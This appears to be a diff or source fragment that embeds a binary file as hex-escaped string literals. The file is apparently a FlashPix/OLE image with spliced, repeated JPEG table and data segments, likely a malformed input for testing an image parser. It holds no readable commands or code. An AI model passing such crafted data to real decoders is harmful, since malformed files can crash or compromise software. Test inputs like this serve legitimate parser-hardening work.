+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3f"
+"\x04\x10\x00\x00\x10\x00\x00\x00\x00\x00\x80\x3f\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x3f"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x80\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x80\x3f\x04\x00\x00\x00\x00\x00\x80\x3f"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x64\x61\x56\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x64\x61\x56"
+"\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x30\x00\x00\x00"
+"\x38\x0b\x00\x00\x20\x00\x00\x00\x01\x00\x00\x00\x08\x01\x00\x00"
+"\x01\x00\x04\x03\x10\x01\x00\x00\x02\x00\x00\x03\x4c\x03\x00\x00"
+"\x01\x00\x03\x03\x54\x03\x00\x00\x01\x00\x02\x03\x90\x05\x00\x00"
+"\x01\x00\x01\x03\xcc\x07\x00\x00\x00\x00\x00\x01\x08\x0a\x00\x00"
+"\x02\x00\x00\x01\x10\x0a\x00\x00\x03\x00\x00\x01\x18\x0a\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00"
+"\xfd\x01\x00\x00\xb6\x01\x00\x00\x38\x00\x00\x00\x40\x00\x00\x00"
+"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00"
+"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x14\x00\x00\x00\xef\x7a\x00\x00\x00\x00\x00\x00"
+"\x52\x00\x65\x00\x73\x00\x6f\x00\x6c\x00\x75\x00\x74\x00\x69\x00"
+"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x32\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x20\x00\x01\x00\xff\xff\xff\xff\xff\xff\xff\xff\x0e\x00\x00\x00"
+"\x00\x61\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b"
+"\x00\x00\x00\x00\x40\xba\xad\x3b\x79\x7f\xc7\x01\xa0\x68\xb8\x3b"
+"\x79\x7f\xc7\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00"
+"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x2a\x00\x02\x01\x0f\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x24\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00"
+"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x38\x00\x00\x00\x83\x20\x00\x00\x00\x00\x00\x00"
+"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
+"\x00\xf4\x83\x67\x70\xca\x41\xbc\x7e\x48\x23\x03\x18\xa9\x2d\x6d"
+"\xe4\x81\x98\xbd\xc3\xca\x08\x18\xdd\xda\xab\x9d\x50\x95\x05\x6d"
+"\x65\x1e\xbb\x86\x31\x5a\x03\x91\x9a\x00\x5a\x28\xa2\x80\x0a\x28"
+"\x04\x00\x00\x01\x20\x0a\x00\x00\x05\x00\x00\x01\x28\x0a\x00\x00"
+"\x06\x00\x00\x01\x30\x0a\x00\x00\x00\x00\x03\x02\x38\x0a\x00\x00"
+"\x01\x00\x03\x02\x40\x0a\x00\x00\x02\x00\x03\x02\x48\x0a\x00\x00"
+"\x03\x00\x03\x02\x64\x0a\x00\x00\x04\x00\x03\x02\x70\x0a\x00\x00"
+"\x00\x00\x02\x02\x78\x0a\x00\x00\x01\x00\x02\x02\x80\x0a\x00\x00"
+"\x02\x00\x02\x02\x88\x0a\x00\x00\x03\x00\x02\x02\xa4\x0a\x00\x00"
+"\x04\x00\x02\x02\xb0\x0a\x00\x00\x00\x00\x01\x02\xb8\x0a\x00\x00"
+"\x01\x00\x01\x02\xc0\x0a\x00\x00\x02\x00\x01\x02\xc8\x0a\x00\x00"
+"\x03\x00\x01\x02\xe4\x0a\x00\x00\x04\x00\x01\x02\xf0\x0a\x00\x00"
+"\x00\x00\x00\x02\xf8\x0a\x00\x00\x01\x00\x00\x02\x00\x0b\x00\x00"
+"\x02\x00\x00\x02\x08\x0b\x00\x00\x03\x00\x00\x02\x24\x0b\x00\x00"
+"\x04\x00\x00\x02\x30\x0b\x00\x00\x02\x00\x00\x00\xb0\x04\x00\x00"
+"\x41\x00\x00\x00\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c"
+"\x08\x09\x0a\x09\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13"
+"\x12\x10\x10\x12\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a"
+"\x29\x30\x36\x45\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48"
+"\x4a\x4e\x4f\x4e\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff"
+"\xdb\x00\x43\x01\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32"
+"\x2a\x32\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01"
+"\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06"
+"\x07\x08\x09\x0a\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05"
+"\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31"
+"\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42"
+"\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18"
+"\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43"
+"\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63"
+"\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83"
+"\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a"
+"\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8"
+"\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6"
+"\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2"
+"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01"
+"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06"
+"\xa2\x80\x0a\x28\xa2\x80\x33\x22\xb9\xba\x8d\xbc\xa9\x93\x7b\x01"
+"\xd3\xbf\xd7\xde\xad\xc5\x77\x1c\x99\x03\xa8\xea\x3b\x8f\xc2\xa4"
+"\x92\x28\xe7\x4c\x38\x0c\x3b\x11\xda\xaa\xcb\x11\x4e\x2e\x10\xcd"
+"\x18\xe9\x20\x1f\x3a\xfd\x71\x57\xa3\x23\x58\x97\x03\x2b\x74\x22"
+"\x9d\x54\x95\x24\xd8\xb2\x5b\xca\xb7\x11\x9e\x57\x79\xe7\xf0\x6a"
+"\x72\xdc\xaa\x90\xb2\x16\x81\x89\x00\x09\x3a\x1f\xa1\xef\x4a\xc3"
+"\xe6\xee\x5b\xa2\x99\xb9\x87\xde\x4f\xfb\xe7\x9a\x55\x65\x62\x40"
+"\x3c\x8e\xb5\x25\x0e\xa2\x8a\x28\x02\x94\x33\xac\x48\xe4\xab\x1c"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00"
+"\xff\x00\x00\x00\xdb\x00\x00\x00\x10\x00\x00\x00\x40\x00\x00\x00"
+"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00"
+"\xb7\x61\xed\x52\x25\xda\xbb\x85\x11\xc9\x9c\xe0\xe4\x74\xaa\x51"
+"\x4e\xdb\xf6\x4a\xbb\x64\x1d\x81\xeb\xf4\xf5\xaa\xd1\xad\xcb\xdd"
+"\xb7\xee\x91\x50\x12\x44\x99\xe4\xfd\x69\x72\xbe\xe3\xe6\x5d\x8d"
+"\x22\xb7\x11\x5e\x1f\xb3\xc3\x1f\x94\xe7\x2e\x73\x8e\x7b\x9c\x7a"
+"\xd5\xc6\x55\x75\x2a\xe0\x32\x9e\x08\x23\x20\xd6\x7c\x6a\xcb\x20"
+"\x6d\xc0\x63\xea\x7f\xad\x5f\x46\x0c\x38\x60\x4d\x09\xb7\xb8\x34"
+"\x96\xc5\x68\x16\x58\xae\x9e\x24\x84\x2d\xb0\xe4\x1c\xfe\x80\x55"
+"\x96\x55\x6c\x6e\x00\xe3\xa7\xb5\x3a\x8a\x62\x1a\x09\x0d\xb7\x69"
+"\xc0\xef\x9a\x75\x14\x50\x06\x4c\x60\x5c\x42\x63\x9f\x99\x10\xe1"
+"\x88\xe3\x9f\x51\x4d\x2c\xd0\x9c\x4e\x72\xbd\x04\xa3\xb7\xd6\x9f"
+"\x28\x31\xdc\x2c\xaa\x09\x0d\xf2\xb8\x1f\xa1\xa9\xc8\x04\x60\x8c"
+"\xe7\x8c\x51\x70\xb0\xdc\x90\x33\xf7\x97\xd4\x52\x82\x0f\x20\xf3"
+"\xed\x55\x64\x22\xce\x5d\xaa\xea\x17\xbc\x4c\xc0\x11\xf4\xa9\x96"
+"\x58\x65\x70\xa9\x22\x97\x3d\x36\x91\x9a\x96\xd5\xf7\x1a\xb9\x3f"
+"\x98\xfb\x48\xdd\x90\x6a\x14\x49\x62\xcf\x97\x31\x03\xae\x08\xcd"
+"\x3c\x06\x04\x86\xe7\x1f\x9d\x2d\x52\x6d\x03\x8a\x62\x2d\xec\xa9"
+"\x93\x34\x39\x51\xd5\x93\x9a\xb5\x14\xf1\xca\xe5\x14\x9d\xc0\x02"
+"\x41\x1e\xb5\x5a\x83\x31\x80\x19\x31\x9f\x5f\x7a\x77\x4c\x9e\x56"
+"\x80\xff\xd9\xdd\x4a\xf6\x27\xde\x93\xb5\xc8\x12\x7b\xef\xb4\xa5"
+"\xb4\xad\x12\xcb\x24\x2c\xff\x00\x2a\xe4\x29\xc8\xc0\xf7\xeb\xff"
+"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11"
+"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00"
+"\x3f\x00\xf4\x6b\xb9\x1d\x25\x3b\x10\x30\xee\x49\xc5\x40\x6e\x1c"
+"\x26\xe2\x8a\x31\xd7\xe7\xa9\xee\xe2\xf3\x25\x20\xb1\x03\xd3\x1d"
+"\x6a\xb3\xda\x7e\xed\x82\x3f\xcc\x47\x04\x81\x59\xbb\xdc\xd5\x38"
+"\xf2\x8e\x82\x76\x99\x89\x00\x6d\x03\xb1\xef\x59\xfa\xa5\xa5\xd4"
+"\x97\x2c\xe8\xae\xa0\xe0\xee\x03\x3c\x62\xb4\xf4\xcb\x69\xd7\x7b"
+"\x5d\x48\xb2\x31\x3c\xb0\x18\x15\x72\x4f\x9a\x29\x18\xf4\x0a\x40"
+"\xfc\xaa\x6b\x61\xe3\x55\x72\xc9\x8a\x15\x9c\x1f\x32\x47\x39\xa6"
+"\xd9\xdd\x2d\xc4\x4c\xea\xee\x03\x06\xdc\x46\x30\x2b\x6d\x5d\x5b"
+"\x21\x48\x24\x75\xa9\xad\xfe\x5b\x58\x5b\xb6\xc5\x07\xf2\xaa\xb7"
+"\x71\xfd\x9a\x6f\x3d\x01\x28\xdf\x78\x0a\x28\xe1\xe3\x45\x38\xc4"
+"\x53\xac\xe6\xf9\x98\x4d\x1c\x8e\xca\x52\x53\x1e\x3a\x80\x3a\xd4"
+"\xb4\x02\x18\x02\x3a\x1a\x2b\x41\x0f\x9b\xfd\x6b\x53\x54\x16\x60"
+"\x07\x53\x4e\x9b\xfd\x6b\x54\x96\xe0\x6d\x66\xef\x4c\x5d\x07\x91"
+"\xb5\x44\x6b\xdf\xbd\x12\x80\x2d\xdc\x0e\x00\x53\xfc\xa9\x50\x67"
+"\x2e\x47\x27\xdb\xa0\xa2\x40\x5a\x26\x51\xd4\x82\x05\x51\x23\x2d"
+"\x40\x36\x71\x03\xc8\x28\x3f\x95\x2e\xd0\xca\xd1\x3f\x34\xb0\x29"
+"\x4b\x78\xd1\xba\xaa\x80\x7f\x2a\x57\x07\x21\x97\xa8\xfe\x54\x3d"
+"\xc3\xa1\x9c\xa0\xdb\xcb\xe4\x30\xf9\x7f\x84\xd1\x34\xa4\x37\x97"
+"\x16\x0c\x87\xf4\xf7\xab\x97\x91\xa4\x88\x37\x8c\xf3\x4d\xb7\x8d"
+"\x0c\xa5\xf0\x37\x0a\x5d\x47\xad\x84\x9b\xfd\x6b\x50\xaf\x85\xda"
+"\x41\x23\x3e\xb4\xe9\x20\x79\x1f\x76\xe0\x3e\x86\x97\xec\x8b\xfd"
+"\xf7\xfc\xe9\x0c\x49\x25\xf3\x23\x28\xcb\xc1\x18\x38\x35\x54\x5b"
+"\x40\x31\x85\x90\x01\x8c\x01\x21\x18\xab\x7f\x65\x5f\xef\xbf\xe7"
+"\x47\xd9\x57\xfb\xef\xf9\xd0\x22\x99\xb4\x84\xc8\xcf\xfb\xd0\x5b"
+"\xaf\xef\x0d\x5b\x59\x76\xc6\x10\x29\xc0\x18\xeb\xcd\x2f\xd9\x17"
+"\xfb\xef\xf9\xd1\xf6\x45\xfe\xfb\xfe\x74\x00\xd7\x90\xb2\x05\xc1"
+"\xfa\x93\x49\x1c\x86\x32\x78\xce\x69\xff\x00\x65\x5f\xef\xbf\xe7"
+"\x47\xd9\x57\xfb\xef\xf9\xd0\x32\xc5\x14\x51\x4c\x41\x45\x14\x50"
+"\x01\x45\x14\x50\x01\x45\x14\x50\x00\xff\xd9\xc9\x3d\x7f\x9d\x16"
+"\xd1\x33\x44\x25\xd2\x6f\x3c\xc8\xc1\xff\x00\x51\x71\xf3\x05\x3e"
+"\x99\xea\xb5\xab\x8c\x5e\xa8\xff\xd8\xff\xc0\x00\x11\x08\x00\x40"
+"\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c"
+"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x29\xe3\x96\x4c\x79"
+"\x53\x79\x78\xeb\xc6\x73\x4b\x6f\x95\x22\x37\x97\xcc\x70\x79\x38"
+"\xc5\x24\xf2\x95\xf9\x63\x1b\x9c\xf1\x8f\x4a\xb3\x6d\x00\x85\x37"
+"\xc8\x72\xdd\x49\x34\xac\x36\xcc\x5d\x6e\xca\xf2\x5b\xe6\x78\x03"
+"\x05\x38\xf9\x80\xce\x78\xa8\x74\xeb\x1b\xc4\xbb\x89\xa4\x56\x70"
+"\x18\x1e\x46\x00\xad\xeb\xac\xcb\xb2\x2e\x86\x43\x80\x3d\x07\x73"
+"\x44\x4a\x61\xb8\x92\x14\xe3\xf8\xd0\x1e\x84\x77\x15\xca\xf0\x30"
+"\x73\xf6\x97\xd6\xf7\x35\x58\x99\x28\xf2\x5b\x42\x29\x3c\xcf\x98"
+"\x2a\xe0\x83\xeb\x50\xbd\xc4\xb1\x00\x64\x44\x50\x7f\xda\xad\x17"
+"\x45\x97\x24\x70\xc2\xa8\x5f\x43\x70\xc1\x7e\xce\xeb\x1c\x8a\x7a"
+"\xb0\xcd\x74\xf2\xdd\xee\x67\xcd\x65\xb0\xc4\xb9\x76\x50\x76\xc6"
+"\x32\x3f\xbf\x52\x48\xc5\xad\x09\x38\xc9\x1c\xe0\xd3\x22\xb4\xdb"
+"\x10\x0e\xff\x00\x36\x39\xc0\x14\xb2\xc7\xe5\xdb\xb0\xdc\x48\xc7"
+"\x7a\x94\x9a\x65\xc9\xa7\x12\xdd\x9d\xa8\x89\x77\xbf\xcc\xe7\xa9"
+"\x3d\x6a\x71\xfb\xc6\xcf\xf0\x8f\xd6\x95\xb2\xe7\x6e\x08\x5e\xfe"
+"\xf4\xd9\xf7\xf9\x0c\x21\xfb\xe4\x60\x7b\x56\xa6\x24\x76\xff\x00"
+"\xbd\xb8\x92\x73\xf7\x47\xc8\x9f\x41\xd7\xf5\xa2\xf7\xf7\x6a\xb7"
+"\x1d\x3c\x93\x96\xff\x00\x77\xbd\x4d\x0c\x62\x28\x96\x35\xe8\xa3"
+"\x14\xe2\x01\x18\x3c\x8a\x2f\xa8\xad\xa0\xd6\x5c\x9d\xca\x70\x7d"
+"\x7d\x69\x08\x12\xae\x18\x61\x87\x5f\x6a\x65\xa4\x6d\x0c\x02\x23"
+"\xd1\x0e\xd5\xe7\xf8\x7b\x54\xae\xbb\xb9\x07\x0c\x3a\x1a\x06\x55"
+"\x74\x28\x70\x7f\x3a\x86\xe7\xfd\x43\x55\xfc\x6f\x52\x1d\x71\x54"
+"\x6e\xd7\x6c\x72\x0f\x4a\x9b\x15\x72\xc0\x9b\x03\x1b\x4f\xe2\x73"
+"\x55\x0d\xa5\xb9\x39\xdb\x20\xe3\x1c\x48\x6a\xe7\xd9\x57\xfb\xef"
+"\xf9\xd1\xf6\x45\xfe\xfb\xfe\x74\x08\x86\xdc\x25\xbe\x76\x06\x39"
+"\x18\xf9\x98\x9a\x92\x49\x44\x8b\xb5\x94\xe3\x39\xe0\xd3\xbe\xca"
+"\xbf\xdf\x7f\xce\x8f\xb2\xaf\xf7\xdf\xf3\xa0\x0a\x62\xd2\x01\x9c"
+"\x09\x06\x4e\x4f\xef\x0f\x26\xae\x09\xc8\x00\x6d\xfd\x68\xfb\x22"
+"\xff\x00\x7d\xff\x00\x3a\x3e\xca\xbf\xdf\x7f\xce\x80\x10\x4e\x41"
+"\x27\x69\xe7\xde\xab\x5d\x9d\xd1\x39\xc7\x5a\xb5\xf6\x45\xfe\xfb"
+"\xfe\x74\x8d\x66\x8c\xa4\x17\x7c\x1f\x7a\x00\xb3\x45\x14\x53\x00"
+"\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xa2\x8a\x28\x00\xff\xd9\x03\x11"
+"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5"
+"\x5a\x6b\xae\xe4\x2b\xb8\xae\x7b\x8e\xa2\xa3\x92\x29\x1d\xb2\xb3"
+"\x07\x08\x09\x0a\x0b\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05"
+"\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06"
+"\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xa1\xb1"
+"\xc1\x09\x23\x33\x52\xf0\x15\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25"
+"\xf1\x17\x18\x19\x1a\x26\x27\x28\x29\x2a\x35\x36\x37\x38\x39\x3a"
+"\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
+"\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
+"\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98"
+"\x99\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6"
+"\xb7\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4"
+"\xd5\xd6\xd7\xd8\xd9\xda\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2"
+"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xd9\x21\x31\x41\x00\x00\x00"
+"\x32\x02\x00\x00\xff\xd8\xff\xdb\x00\x43\x00\x0c\x08\x09\x0a\x09"
+"\x07\x0c\x0a\x09\x0a\x0d\x0c\x0c\x0e\x12\x1e\x13\x12\x10\x10\x12"
+"\x25\x1a\x1c\x16\x1e\x2c\x26\x2e\x2d\x2b\x26\x2a\x29\x30\x36\x45"
+"\x3b\x30\x33\x42\x34\x29\x2a\x3c\x52\x3d\x42\x48\x4a\x4e\x4f\x4e"
+"\x2f\x3a\x55\x5b\x55\x4c\x5b\x45\x4c\x4e\x4b\xff\xdb\x00\x43\x01"
+"\x0c\x0d\x0d\x12\x0f\x12\x23\x13\x13\x23\x4b\x32\x2a\x32\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
+"\xff\xc4\x01\xa2\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a"
+"\x0b\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00"
+"\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51"
+"\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23\x42\xb1\xc1\x15\x52"
+"\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17\x18\x19\x1a\x25\x26"
+"\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47"
+"\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67"
+"\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x83\x84\x85\x86\x87"
+"\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5"
+"\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3"
+"\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda"
+"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1\xf2\xf3\xf4\xf5\xf6"
+"\xf7\xf8\xf9\xfa\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01"
+"\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a"
+"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
+"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x29\x09\x03"
+"\xa9\xa8\xde\x65\x53\x81\x92\x7d\x05\x00\x3a\x54\x57\x8c\x87\xce"
+"\x3d\x8e\x2a\xa6\xeb\x4e\x7f\x79\x27\xfd\xf4\xd5\x2c\x8f\x29\xc0"
+"\xfb\x99\xe8\xa3\x92\x6a\x3f\xb3\x20\x65\x12\x39\x25\xb3\x92\x1b"
+"\xa5\x3b\x13\x71\xf0\x2d\xbc\x8f\xbe\x22\xc4\xaf\xa9\x3f\xd6\xad"
+"\x55\x30\xb3\x5b\xf4\x7d\xe9\xea\xdc\xfe\x75\x2a\xcf\xd3\x78\xdb"
+"\x9e\xfd\xa8\xb0\xee\x4f\x45\x34\x30\x3d\xe9\xd4\x86\x34\xae\x41"
+"\xe7\x9f\x5a\x6c\x51\x08\x54\xfc\xc4\xe4\xe4\x93\x4d\x79\xf0\x48"
+"\x51\xc8\xaa\xf2\xcc\x7f\x8d\xb1\xf5\xe0\x52\xb8\x58\x95\x9d\x23"
+"\x94\xc9\xbc\xb6\x46\x31\xd8\x56\x45\xf2\xc9\x3d\xca\xcb\x1b\x3a"
+"\xaf\xb1\xc5\x5c\x5f\xdf\x9c\xe7\xe4\x1e\x9d\xe9\xdb\x03\x48\xc0"
+"\xaf\xcb\xb7\x18\xa5\x28\xc6\x6a\xd2\x1a\x6d\x6a\x84\x37\x8e\x81"
+"\x02\x65\x81\x38\x23\x6f\x4a\xb5\x6c\x41\x0e\x0e\x70\x4f\xdd\x3d"
+"\x05\x53\x54\x27\x23\x24\x3a\xf1\x93\xdc\x7b\xd3\x92\x5f\x9b\x61"
+"\x20\x38\x38\xda\x4d\x37\xa0\x6e\x5f\x8e\x30\x8a\x57\x39\x19\xc8"
+"\xcf\x6a\x78\x18\xaa\x27\x2d\x82\x4b\x02\x3a\x73\x4f\x8e\x57\x8c"
+"\xe5\xe4\xca\x8e\xb9\x14\xc5\xa9\x05\xc7\x9c\x25\x72\x99\xc7\x34"
+"\xc3\x68\x6e\xec\x40\x98\xba\x1f\xbd\x8e\xf5\x6f\x6e\xe9\x88\xf7"
+"\xa9\x88\x1e\x5b\x7b\x8e\x05\x43\x82\x92\x6a\x45\x73\xb5\x6b\x19"
+"\xf0\x5a\x8b\x2b\x60\x50\x96\x52\x72\xd9\xed\x53\x28\x19\x2c\x33"
+"\xcf\xbd\x5a\x51\x98\x97\x23\x38\x18\x22\xaa\xb4\x0e\x24\xf2\x95"
+"\xb0\xa4\xf0\x7b\x81\x4d\x41\x45\x5a\x22\xe6\x6d\xdd\x8d\x8d\x37"
+"\xdc\x7c\x99\xe3\xef\x12\x78\x15\x5a\x4d\x32\x26\xd4\x0c\xdb\xe4"
+"\xc1\x7c\x9e\x78\xcf\x5a\xd3\x54\x58\xa3\xda\xa3\xe5\x5f\xd6\x94"
+"\x47\x9b\x72\x0f\xde\x3c\xe7\xde\x89\x53\x84\xfe\x25\x70\x53\x94"
+"\x76\x65\x4b\xa8\xe4\x8d\x0b\xc6\x58\xfa\x01\xde\xa1\x1e\x77\x94"
+"\xc6\x4c\xf2\xbe\xb5\xa4\xbf\x3a\x03\x8e\x48\xe4\x55\x7b\xa8\xf6"
+"\xc4\xc4\x74\x20\xd0\xd0\xd4\x87\xed\x90\xc8\xc5\x07\x7f\x5a\x47"
+"\x86\x49\x08\x2e\x80\x91\xef\x53\xc7\xd4\xd4\x95\x44\x95\x12\x19"
+"\x23\x24\xa2\x05\xcf\x5e\x69\x76\x4d\xbb\x76\x06\x47\xbd\x5a\xa2"
+"\x80\x2a\x3c\x32\x48\x00\x74\x0d\x8e\x99\x34\xa2\x39\x55\x36\x05"
